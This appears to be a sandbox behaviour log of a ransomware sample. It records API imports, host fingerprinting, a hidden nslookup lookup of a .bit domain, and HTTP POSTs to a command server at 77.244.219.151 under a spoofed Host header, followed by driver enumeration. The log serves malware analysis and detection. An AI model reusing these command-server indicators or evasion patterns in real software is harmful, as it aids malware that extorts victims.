| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74146890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74139b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74146ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74139bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x74139b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74138d60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x74146a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74139970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x7413ea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x741399f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74137810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x741378b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x7413f5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x74146b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74137710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74131ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x76ec2bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74138c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7413b000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74147b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74139bf0 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76840000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x76878a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7686f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7685d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x7685abd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x7685a740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x768bfec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x76874f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x76878a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x768792b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x76859580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76878e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x76859860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x76855d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x768562e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x76f1aee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x768683a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x768704a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76878cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x76853780 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x764e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76588830 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x76de0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76ddf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x76ddfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76ddf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x76ddfb30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76de0590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x76df6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76de0650 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76ddfaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76df6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x76de3910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x76de0400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76de1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76ddf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76ddf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x76ddf660 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x750e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x7527d9f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x7528f9c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x7527e690 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x74c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74c6d6d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74c6e0f0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x6fdc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x6fe8d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x6fe3bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x6fe86ef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x6fe745f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x6fe40fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x6fe88490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x6fe47320 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x74560000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x74561340 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x745613a0 |
|
1 |
Thread 0xd70
77
35
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Mutex | Create | mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| System | Get Time | type = Ticks, time = 43203 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Control Panel\International |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 14 |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 285192, size_out = 285192 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup politiaromana.bit ns1.virmach.ru, os_pid = 0xdc4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 101 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 77.244.219.151, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = eighge, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/eighge |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 552 |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 51656 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 78015 |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup politiaromana.bit ns1.virmach.ru, os_pid = 0xee4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 101 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 77.244.219.151, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = store?steepl=aiplau&sauf=iesay, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/store?steepl=aiplau&sauf=iesay |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x76ddfb50 |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x76ddfb50 |
|
1 |
Thread 0xd84
261
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Driver | Enumerate | load_addresses = 1703688 |
|
1 | |
| Driver | Enumerate | load_addresses = 5832704 |
|
1 | |
| Driver | Get Name | load_address = 3483488256 |
|
1 | |
| Driver | Get Name | load_address = 3491663872 |
|
1 | |
| Driver | Get Name | load_address = 3467825152 |
|
1 | |
| Driver | Get Name | load_address = 1801781248 |
|
1 | |
| Driver | Get Name | load_address = 1802371072 |
|
1 | |
| Driver | Get Name | load_address = 1802436608 |
|
1 | |
| Driver | Get Name | load_address = 1802895360 |
|
1 | |
| Driver | Get Name | load_address = 1803091968 |
|
1 | |
| Driver | Get Name | load_address = 1803223040 |
|
1 | |
| Driver | Get Name | load_address = 1803288576 |
|
1 | |
| Driver | Get Name | load_address = 1803354112 |
|
1 | |
| Driver | Get Name | load_address = 1797259264 |
|
1 | |
| Driver | Get Name | load_address = 1797914624 |
|
1 | |
| Driver | Get Name | load_address = 1798307840 |
|
1 | |
| Driver | Get Name | load_address = 1798766592 |
|
1 | |
| Driver | Get Name | load_address = 1798963200 |
|
1 | |
| Driver | Get Name | load_address = 1799684096 |
|
1 | |
| Driver | Get Name | load_address = 1800536064 |
|
1 | |
| Driver | Get Name | load_address = 1800667136 |
|
1 | |
| Driver | Get Name | load_address = 1800863744 |
|
1 | |
| Driver | Get Name | load_address = 1800929280 |
|
1 | |
| Driver | Get Name | load_address = 1819148288 |
|
1 | |
| Driver | Get Name | load_address = 1819738112 |
|
1 | |
| Driver | Get Name | load_address = 1819803648 |
|
1 | |
| Driver | Get Name | load_address = 1819934720 |
|
1 | |
| Driver | Get Name | load_address = 1820000256 |
|
1 | |
| Driver | Get Name | load_address = 1820131328 |
|
1 | |
| Driver | Get Name | load_address = 1803550720 |
|
1 | |
| Driver | Get Name | load_address = 1803943936 |
|
1 | |
| Driver | Get Name | load_address = 1804075008 |
|
1 | |
| Driver | Get Name | load_address = 1804206080 |
|
1 | |
| Driver | Get Name | load_address = 1804337152 |
|
1 | |
| Driver | Get Name | load_address = 1804533760 |
|
1 | |
| Driver | Get Name | load_address = 1805123584 |
|
1 | |
| Driver | Get Name | load_address = 1805254656 |
|
1 | |
| Driver | Get Name | load_address = 1805647872 |
|
1 | |
| Driver | Get Name | load_address = 1805778944 |
|
1 | |
| Driver | Get Name | load_address = 1805975552 |
|
1 | |
| Driver | Get Name | load_address = 1806499840 |
|
1 | |
| Driver | Get Name | load_address = 1806630912 |
|
1 | |
| Driver | Get Name | load_address = 1806761984 |
|
1 | |
| Driver | Get Name | load_address = 1807024128 |
|
1 | |
| Driver | Get Name | load_address = 1809252352 |
|
1 | |
| Driver | Get Name | load_address = 1809317888 |
|
1 | |
| Driver | Get Name | load_address = 1810497536 |
|
1 | |
| Driver | Get Name | load_address = 1811021824 |
|
1 | |
| Driver | Get Name | load_address = 1811218432 |
|
1 | |
| Driver | Get Name | load_address = 1813708800 |
|
1 | |
| Driver | Get Name | load_address = 1814167552 |
|
1 | |
| Driver | Get Name | load_address = 1814364160 |
|
1 | |
| Driver | Get Name | load_address = 1815085056 |
|
1 | |
| Driver | Get Name | load_address = 1815543808 |
|
1 | |
| Driver | Get Name | load_address = 1815871488 |
|
1 | |
| Driver | Get Name | load_address = 1816133632 |
|
1 | |
| Driver | Get Name | load_address = 1816264704 |
|
1 | |
| Driver | Get Name | load_address = 1816788992 |
|
1 | |
| Driver | Get Name | load_address = 1817968640 |
|
1 | |
| Driver | Get Name | load_address = 1818099712 |
|
1 | |
| Driver | Get Name | load_address = 1818165248 |
|
1 | |
| Driver | Get Name | load_address = 1818230784 |
|
1 | |
| Driver | Get Name | load_address = 1818296320 |
|
1 | |
| Driver | Get Name | load_address = 1818427392 |
|
1 | |
| Driver | Get Name | load_address = 1832648704 |
|
1 | |
| Driver | Get Name | load_address = 1834680320 |
|
1 | |
| Driver | Get Name | load_address = 1834811392 |
|
1 | |
| Driver | Get Name | load_address = 1834942464 |
|
1 | |
| Driver | Get Name | load_address = 1824522240 |
|
1 | |
| Driver | Get Name | load_address = 1824718848 |
|
1 | |
| Driver | Get Name | load_address = 1824784384 |
|
1 | |
| Driver | Get Name | load_address = 1825112064 |
|
1 | |
| Driver | Get Name | load_address = 1825767424 |
|
1 | |
| Driver | Get Name | load_address = 1825898496 |
|
1 | |
| Driver | Get Name | load_address = 1826095104 |
|
1 | |
| Driver | Get Name | load_address = 1826226176 |
|
1 | |
| Driver | Get Name | load_address = 1826750464 |
|
1 | |
| Driver | Get Name | load_address = 1827340288 |
|
1 | |
| Driver | Get Name | load_address = 1827405824 |
|
1 | |
| Driver | Get Name | load_address = 1827471360 |
|
1 | |
| Driver | Get Name | load_address = 1827536896 |
|
1 | |
| Driver | Get Name | load_address = 1827602432 |
|
1 | |
| Driver | Get Name | load_address = 1827930112 |
|
1 | |
| Driver | Get Name | load_address = 1828192256 |
|
1 | |
| Driver | Get Name | load_address = 1828323328 |
|
1 | |
| Driver | Get Name | load_address = 1828388864 |
|
1 | |
| Driver | Get Name | load_address = 1828519936 |
|
1 | |
| Driver | Get Name | load_address = 1828651008 |
|
1 | |
| Driver | Get Name | load_address = 1829044224 |
|
1 | |
| Driver | Get Name | load_address = 1829240832 |
|
1 | |
| Driver | Get Name | load_address = 1829699584 |
|
1 | |
| Driver | Get Name | load_address = 1829830656 |
|
1 | |
| Driver | Get Name | load_address = 1830354944 |
|
1 | |
| Driver | Get Name | load_address = 1831403520 |
|
1 | |
| Driver | Get Name | load_address = 1831469056 |
|
1 | |
| Driver | Get Name | load_address = 1831534592 |
|
1 | |
| Driver | Get Name | load_address = 1831600128 |
|
1 | |
| Driver | Get Name | load_address = 1832124416 |
|
1 | |
